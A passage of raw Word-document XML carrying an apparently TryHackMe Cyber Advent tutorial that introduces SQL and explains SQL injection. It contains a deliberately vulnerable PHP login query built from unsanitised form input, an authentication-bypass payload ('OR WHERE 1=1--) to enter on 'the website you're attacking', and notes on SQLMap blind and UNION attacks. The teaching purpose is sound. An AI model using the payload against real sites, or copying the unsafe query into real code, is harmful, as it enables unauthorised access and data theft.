        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Within an SQL database, there are tables containing rows and columns. Each row is an entry in the table, and the data in each column can represent a wide range of things! For example, we could have a table called ‘Customers’ which contains information about people who shop at our online store. We could have columns such as “CustomerName” to store their name, “City” to store the city they reside in, “DOB” to store their date of birth and so on. Each row would represent a unique customer, and the data stored in each column on that row would be associated with that customer (entry).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799E2C14" w14:textId="27007F47" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">tructured </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>anguage)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> queries are fairly straightforward and offer an English-like syntax. For example, you could query a table called ‘Customers’ and retrieve the customer names and the cities they reside in using the following query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C346F6" w14:textId="0181AEB6" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000CD"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CustomerName, City </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000CD"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Customers;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4AA605" w14:textId="32920F83" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Wildcard operators you may be familiar with, such as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> also exist within SQL, for example, we could modify our above query to retrieve all details associated with each entry in the Customers table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085F959F" w14:textId="66146EF6" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000CD"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> * </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000CD"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Customers;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B41ADC" w14:textId="0843EED5" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>So, from a security perspective, how can we take over a SQL database? There’s quite a motivation to retrieve valuable information from a corporate database after all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A96174" w14:textId="09C33501" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It’s quite unlikely that we’d be exploiting a vulnerability in the SQL server itself, but instead we can always rely on poor implementation by lazy or inexperienced developers! The Cyber Advent challenge today is based on a very popular Udemy course, but a few corners were cut to get the web application released in time for Christmas! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E89847A" w14:textId="4710A2B8" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It’s relatively simple to connect a web application to a SQL server, and it’s also particularly easy to implement this in a very insecure manner. In this example, let’s look at a SQL statement implemented in the PHP programming language:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF52A6D" w14:textId="3EA88BDE" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>$email = $_POST['log_email']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5943C022" w14:textId="2BFAEE36" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>$check_database_query = mysqli_query($con, "SELECT * FROM users WHERE email='$email' AND password='$password'");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765149A4" w14:textId="0B39871F" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Don’t be put off if this doesn’t make a lot of sense right now! What’s important is understanding the process that’s occurring here. The first line is specific to PHP, and is assigning the input from a form (user-defined input) into a variable, $email. The second line then queries the database to SELECT information from the SQL database, identified by the email AND password that the user supplied (this is a basic authentication system).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A57CE0A" w14:textId="187EE49B" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The fundamental issue with this implementation is that the user’s input is not being sanitised in any way, we are blindly trusting our users, which is a terrible idea at the best of times. See how the $email variable is surrounded by single-quotation marks? As an attacker, we can take advantage of this! We can cleverly craft our ‘email’ input to instead break out of these quotation marks and allow us to execute arbitrary SQL queries of our choosing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19632F27" w14:textId="313F481D" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, if there was no input sanitation on the email field, we could simply put a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>before a SQL statement of our choosing. We could potentially exploit boolean-logic to bypass this authentication system by crafting a SQL query that always returns as True. Confused? That’s to be expected. Let’s take a deeper thought.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A17F3" w14:textId="1500DBBA" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>We know that 1 is always equal to 1, there’s no possible scenario where this would not be true. We can use this fact to bypass any conditions an existing SQL statement is looking for. Let’s take a section the query from above:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE8E2E4" w14:textId="34D34013" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE email='$email'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B873157" w14:textId="76CD50D3" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The query will only return entries if the email column matches the email input provided by the user. OR we could use our quotation mark in combination with the knowledge of 1=1 to create a completely different SQL statement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B18E2A8" w14:textId="09C41756" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>SELECT * FROM users WHERE email='$email’OR WHERE 1=1--'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BC0FDC" w14:textId="77777777" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Now it doesn’t matter what we enter as our email, because this statement will check if the email entered matches OR if 1 is equal to 1, which we know is always true. Therefore, our new statement will just pull all the records from the users table, because 1 will always equal 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC019DB" w14:textId="759DAD45" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If you’re eagle-eyed, you’d have noticed the additional dashes -- appended to that statement. This is sometimes necessary. The double dash comments out the rest of the existing SQL query that exists after our injected query, this double dash ensures our query is a valid SQL query and there aren’t any mismatched quotation marks (remember we inserted an additional one before).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202F2ED5" w14:textId="6498BF45" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In practice, you could undertake this by simply entering your email address as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098F9C6D" w14:textId="54BCC91E" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>’OR WHERE 1=1--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325AAEFF" w14:textId="649D4D00" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In the e-mail field of the website you’re attacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A61D9C8" w14:textId="70967B13" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a very basic example of SQL injection and thankfully most developers know to sanitise their inputs, at least to an extent. You can learn more about SQL injection in various rooms on TryHackMe - </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/sqli</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/uopeasy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/jurassicpark</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://tryhackme.com/room/ccpentesting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DF4DEA" w14:textId="33709863" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It can be rather time-consuming to get the perfect SQLi for any given scenario. Thankfully, automated tools exist! The two most popular being SQLmap and the ever-useful Burp Suite. It’s important to note that automated SQLi tools are rather easy to detect from a SysAdmin perspective, think of them as analogous to a bull in a china shop! SQLi tools typically attempt lots of techniques in a very short period of time and do not look remotely similar to normal user behaviour. It’s still very valuable to learn the fundamentals of SQLi by hand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551B0CEA" w14:textId="720C7548" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQLMap is a command-line tool that is pre-installed on most pentesting distributions. It offers several options depending on the kind of web application being attacked, but also usefully offers a wizard to guide newcomers through the process. SQLMap is rather intelligent as it suggests parameters that may be worth investigating further, as well as eliminating attacks that may not be relevant (for example, MSSQL specific injections when a MySQL DBMS has been detected). In some scenarios, we don’t get visual feedback from a SQL command when attempting a SQLi, this is known as a blind injection. Blind injections are much more difficult, as you won’t know you’ve got it right (or are getting close) until everything clicks! SQLMap can perform blind timing-based attacks which exploit the execution time of queries. By timing the response times on a variety of queries, SQLMap can enumerate data from a database, albeit at a significantly slower rate than just being able to dump all the information at once. SQLMap also automates a lot of the more laborious tasks, such as determining UNION select queries.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D461C" w14:textId="0053D480" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
